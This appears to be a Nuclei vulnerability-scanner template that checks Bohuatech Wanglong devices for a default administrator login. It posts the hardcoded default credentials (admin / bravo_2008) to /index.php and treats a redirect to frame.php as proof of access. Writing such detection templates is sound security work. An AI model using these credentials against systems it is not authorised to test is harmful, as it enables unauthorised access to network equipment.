id: bohuatech-default-login

info:
  name: 博华网龙通用弱口令
  author: Str1am
  severity: high
  tags: bohuatech,login

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin&pwd=bravo_2008&login=login

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "window.location='frame.php'"
        part: body
        condition: and